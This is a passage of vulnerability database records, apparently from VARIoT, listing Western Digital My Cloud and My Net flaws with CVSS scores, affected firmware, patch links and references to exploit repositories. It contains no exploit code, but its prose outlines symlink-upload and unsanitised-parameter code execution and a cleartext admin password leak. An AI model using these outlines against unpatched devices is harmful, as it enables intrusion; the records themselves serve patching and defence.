"title": "Patch for Western Digital My Cloud OS 5 Authorization Issue Vulnerability (CNVD-2022-06493)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/315886"
},
{
"title": "Western Digital My Cloud Security vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=178297"
},
{
"title": "CVE-2022-XXXX",
"trust": 0.1,
"url": "https://github.com/alphabugx/cve-2022-23305 "
},
{
"title": "CVE-2022-XXXX",
"trust": 0.1,
"url": "https://github.com/alphabugx/cve-2022-rce "
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-347"
},
{
"db": "CNVD",
"id": "CNVD-2022-06493"
},
{
"db": "VULMON",
"id": "CVE-2022-22990"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-003515"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-1068"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-697",
"trust": 1.0
},
{
"problemtype": "Inappropriate authentication (CWE-287) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-003515"
},
{
"db": "NVD",
"id": "CVE-2022-22990"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.zerodayinitiative.com/advisories/zdi-22-347/"
},
{
"trust": 3.1,
"url": "https://www.zerodayinitiative.com/advisories/zdi-22-076/"
},
{
"trust": 3.0,
"url": "https://www.westerndigital.com/support/product-security/wdc-22002-my-cloud-os5-firmware-5-19-117"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22990"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022021810"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/697.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/alphabugx/cve-2022-23305"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-347"
},
{
"db": "CNVD",
"id": "CNVD-2022-06493"
},
{
"db": "VULMON",
"id": "CVE-2022-22990"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-003515"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-1068"
},
{
"db": "NVD",
"id": "CVE-2022-22990"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-22-347"
},
{
"db": "CNVD",
"id": "CNVD-2022-06493"
},
{
"db": "VULMON",
"id": "CVE-2022-22990"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-003515"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-1068"
},
{
"db": "NVD",
"id": "CVE-2022-22990"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-02-15T00:00:00",
"db": "ZDI",
"id": "ZDI-22-347"
},
{
"date": "2022-01-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2022-06493"
},
{
"date": "2022-01-13T00:00:00",
"db": "VULMON",
"id": "CVE-2022-22990"
},
{
"date": "2023-02-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-003515"
},
{
"date": "2022-01-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202201-1068"
},
{
"date": "2022-01-13T21:15:08.917000",
"db": "NVD",
"id": "CVE-2022-22990"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-02-15T00:00:00",
"db": "ZDI",
"id": "ZDI-22-347"
},
{
"date": "2022-01-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2022-06493"
},
{
"date": "2023-07-11T00:00:00",
"db": "VULMON",
"id": "CVE-2022-22990"
},
{
"date": "2023-02-22T05:48:00",
"db": "JVNDB",
"id": "JVNDB-2022-003515"
},
{
"date": "2023-07-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202201-1068"
},
{
"date": "2023-07-11T19:56:29.410000",
"db": "NVD",
"id": "CVE-2022-22990"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202201-1068"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "My\u00a0Cloud\u00a0 Authentication vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-003515"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202201-1068"
}
],
"trust": 0.6
}
}
VAR-201905-0058
Vulnerability from variot - Updated: 2023-12-26 23:13Western Digital My Cloud Cloud, Mirror Gen2, EX2 Ultra, EX2100, EX4100, DL2100, DL4100, PR2100 and PR4100 before firmware 2.31.183 are affected by a code execution (as root, starting from a low-privilege user session) vulnerability. The cgi-bin/webfile_mgr.cgi file allows arbitrary file write by abusing symlinks. Specifically, this occurs by uploading a tar archive that contains a symbolic link, then uploading another archive that writes a file to the link using the "cgi_untar" command. Other commands might also be susceptible. Code can be executed because the "name" parameter passed to the cgi_unzip command is not sanitized. plural Western Digital My Cloud The product contains a link interpretation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Western Digital MyCloud Mirror Gen 2 and others are products of Western Digital Corporation. WesternDigitalMyCloudMirrorGen2 is a personal cloud storage device. WesternDigitalMyCloudEX2Ultra is a personal cloud storage device. The Western Digital MyCloud EX2100 is a personal storage device. A security vulnerability exists in several WesternDigital products that originated from the failure of the program to filter the \342\200\230name\342\200\231 parameter passed to the cgi_unzip command. An attacker could exploit the vulnerability to execute code
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201905-0058",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "my cloud ex2 ultra",
"scope": "lt",
"trust": 1.0,
"vendor": "westerndigital",
"version": "2.31.183"
},
{
"model": "my cloud dl4100",
"scope": "lt",
"trust": 1.0,
"vendor": "westerndigital",
"version": "2.31.183"
},
{
"model": "my cloud mirror gen2",
"scope": "lt",
"trust": 1.0,
"vendor": "westerndigital",
"version": "2.31.183"
},
{
"model": "my cloud dl2100",
"scope": "lt",
"trust": 1.0,
"vendor": "westerndigital",
"version": "2.31.183"
},
{
"model": "my cloud pr4100",
"scope": "lt",
"trust": 1.0,
"vendor": "westerndigital",
"version": "2.31.183"
},
{
"model": "my cloud",
"scope": "lt",
"trust": 1.0,
"vendor": "westerndigital",
"version": "2.31.183"
},
{
"model": "my cloud ex2100",
"scope": "lt",
"trust": 1.0,
"vendor": "westerndigital",
"version": "2.31.183"
},
{
"model": "my cloud ex4100",
"scope": "lt",
"trust": 1.0,
"vendor": "westerndigital",
"version": "2.31.183"
},
{
"model": "my cloud pr2100",
"scope": "lt",
"trust": 1.0,
"vendor": "westerndigital",
"version": "2.31.183"
},
{
"model": "my cloud dl2100",
"scope": "lt",
"trust": 0.8,
"vendor": "western digital",
"version": "2.31.183"
},
{
"model": "my cloud dl4100",
"scope": "lt",
"trust": 0.8,
"vendor": "western digital",
"version": "2.31.183"
},
{
"model": "my cloud ex2 ultra",
"scope": "lt",
"trust": 0.8,
"vendor": "western digital",
"version": "2.31.183"
},
{
"model": "my cloud ex2100",
"scope": "lt",
"trust": 0.8,
"vendor": "western digital",
"version": "2.31.183"
},
{
"model": "my cloud ex4100",
"scope": "lt",
"trust": 0.8,
"vendor": "western digital",
"version": "2.31.183"
},
{
"model": "my cloud mirror gen2",
"scope": "lt",
"trust": 0.8,
"vendor": "western digital",
"version": "2.31.183"
},
{
"model": "my cloud pr2100",
"scope": "lt",
"trust": 0.8,
"vendor": "western digital",
"version": "2.31.183"
},
{
"model": "my cloud pr4100",
"scope": "lt",
"trust": 0.8,
"vendor": "western digital",
"version": "2.31.183"
},
{
"model": "my cloud",
"scope": "lt",
"trust": 0.8,
"vendor": "western digital",
"version": "2.31.183"
},
{
"model": "digital my cloud",
"scope": "lt",
"trust": 0.6,
"vendor": "western",
"version": "2.31.183"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16523"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004912"
},
{
"db": "NVD",
"id": "CVE-2019-9949"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:westerndigital:my_cloud_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.31.183",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:westerndigital:my_cloud_mirror_gen2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.31.183",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_mirror_gen2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:westerndigital:my_cloud_ex2_ultra_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.31.183",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_ex2_ultra:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:westerndigital:my_cloud_ex2100_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.31.183",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_ex2100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:westerndigital:my_cloud_ex4100_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.31.183",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_ex4100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:westerndigital:my_cloud_dl2100_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.31.183",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_dl2100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:westerndigital:my_cloud_dl4100_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.31.183",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_dl4100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:westerndigital:my_cloud_pr2100_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.31.183",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_pr2100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:westerndigital:my_cloud_pr4100_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.31.183",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_pr4100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-9949"
}
]
},
"cve": "CVE-2019-9949",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2019-9949",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2019-16523",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-9949",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-9949",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2019-16523",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201905-959",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2019-9949",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16523"
},
{
"db": "VULMON",
"id": "CVE-2019-9949"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004912"
},
{
"db": "NVD",
"id": "CVE-2019-9949"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-959"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Western Digital My Cloud Cloud, Mirror Gen2, EX2 Ultra, EX2100, EX4100, DL2100, DL4100, PR2100 and PR4100 before firmware 2.31.183 are affected by a code execution (as root, starting from a low-privilege user session) vulnerability. The cgi-bin/webfile_mgr.cgi file allows arbitrary file write by abusing symlinks. Specifically, this occurs by uploading a tar archive that contains a symbolic link, then uploading another archive that writes a file to the link using the \"cgi_untar\" command. Other commands might also be susceptible. Code can be executed because the \"name\" parameter passed to the cgi_unzip command is not sanitized. plural Western Digital My Cloud The product contains a link interpretation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Western Digital MyCloud Mirror Gen 2 and others are products of Western Digital Corporation. WesternDigitalMyCloudMirrorGen2 is a personal cloud storage device. WesternDigitalMyCloudEX2Ultra is a personal cloud storage device. The Western Digital MyCloud EX2100 is a personal storage device. A security vulnerability exists in several WesternDigital products that originated from the failure of the program to filter the \\342\\200\\230name\\342\\200\\231 parameter passed to the cgi_unzip command. An attacker could exploit the vulnerability to execute code",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-9949"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004912"
},
{
"db": "CNVD",
"id": "CNVD-2019-16523"
},
{
"db": "VULMON",
"id": "CVE-2019-9949"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-9949",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004912",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-16523",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201905-959",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2019-9949",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16523"
},
{
"db": "VULMON",
"id": "CVE-2019-9949"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004912"
},
{
"db": "NVD",
"id": "CVE-2019-9949"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-959"
}
]
},
"id": "VAR-201905-0058",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16523"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16523"
}
]
},
"last_update_date": "2023-12-26T23:13:07.646000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "New Release - My Cloud Firmware Versions 2.31.183 (05/20/2019)",
"trust": 0.8,
"url": "https://community.wd.com/t/new-release-my-cloud-firmware-versions-2-31-183-05-20-2019/237717"
},
{
"title": "Patches for several WesternDigital product code execution vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/163029"
},
{
"title": "Multiple Western Digital Product security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=92914"
},
{
"title": "https://github.com/bnbdr/wd-rce",
"trust": 0.1,
"url": "https://github.com/bnbdr/wd-rce "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16523"
},
{
"db": "VULMON",
"id": "CVE-2019-9949"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004912"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-959"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-59",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-004912"
},
{
"db": "NVD",
"id": "CVE-2019-9949"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://community.wd.com/t/new-release-my-cloud-firmware-versions-2-31-183-05-20-2019/237717"
},
{
"trust": 1.7,
"url": "https://github.com/bnbdr/wd-rce/"
},
{
"trust": 1.7,
"url": "https://bnbdr.github.io/posts/wd/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9949"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-9949"
},
{
"trust": 0.6,
"url": "https://web.nvd.nist.gov//vuln/detail/cve-2019-9949"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/59.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/bnbdr/wd-rce"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16523"
},
{
"db": "VULMON",
"id": "CVE-2019-9949"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004912"
},
{
"db": "NVD",
"id": "CVE-2019-9949"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-959"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-16523"
},
{
"db": "VULMON",
"id": "CVE-2019-9949"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004912"
},
{
"db": "NVD",
"id": "CVE-2019-9949"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-959"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16523"
},
{
"date": "2019-05-23T00:00:00",
"db": "VULMON",
"id": "CVE-2019-9949"
},
{
"date": "2019-06-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-004912"
},
{
"date": "2019-05-23T14:29:08",
"db": "NVD",
"id": "CVE-2019-9949"
},
{
"date": "2019-05-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-959"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16523"
},
{
"date": "2019-05-29T00:00:00",
"db": "VULMON",
"id": "CVE-2019-9949"
},
{
"date": "2019-06-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-004912"
},
{
"date": "2019-05-29T01:08:48.260000",
"db": "NVD",
"id": "CVE-2019-9949"
},
{
"date": "2019-05-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-959"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-959"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Western Digital My Cloud Link interpretation vulnerabilities in products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-004912"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "post link",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-959"
}
],
"trust": 0.6
}
}
VAR-201307-0443
Vulnerability from variot - Updated: 2023-12-18 14:06main_internet.php on the Western Digital My Net N600 and N750 with firmware 1.03.12 and 1.04.16, and the N900 and N900C with firmware 1.05.12, 1.06.18, and 1.06.28, allows remote attackers to discover the cleartext administrative password by reading the "var pass=" line within the HTML source code. Western Digital My Net is a series of router products from Western Digital, USA. An information disclosure vulnerability exists in a number of Western Digital My Net devices that can expose administrator credentials. This vulnerability could be used by unauthorized attackers to gain sensitive information that can help launch further attacks. There is a security hole in the main_internet.php file
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
